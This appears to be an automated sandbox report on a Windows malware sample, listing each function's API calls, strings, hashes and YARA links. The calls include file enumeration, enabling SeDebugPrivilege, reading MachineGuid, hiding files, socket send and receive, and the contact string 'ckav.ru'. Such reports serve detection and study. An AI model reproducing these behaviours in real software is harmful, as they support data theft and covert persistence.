FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
